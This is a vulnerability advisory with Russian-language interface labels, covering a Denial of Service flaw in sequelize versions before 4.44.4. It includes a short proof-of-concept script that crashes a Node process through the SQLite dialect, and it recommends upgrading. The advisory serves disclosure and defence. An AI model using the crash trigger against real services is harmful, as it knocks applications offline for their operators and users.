Описание
Denial of Service in sequelize
Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.
The following proof-of-concept crashes the Node process:
const Sequelize = require('sequelize');
const sequelize = new Sequelize({
dialect: 'sqlite',
storage: 'database.sqlite'
});
const TypeError = sequelize.define('TypeError', {
name: Sequelize.STRING,
});
TypeError.sync({force: true}).then(() => {
return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
Recommendation
Upgrade to version 4.44.4 or later.
Пакеты
Наименование
sequelize
npm
Затронутые версииВерсия исправления
< 4.44.4
4.44.4
Дефекты
CWE-248
Дефекты
CWE-248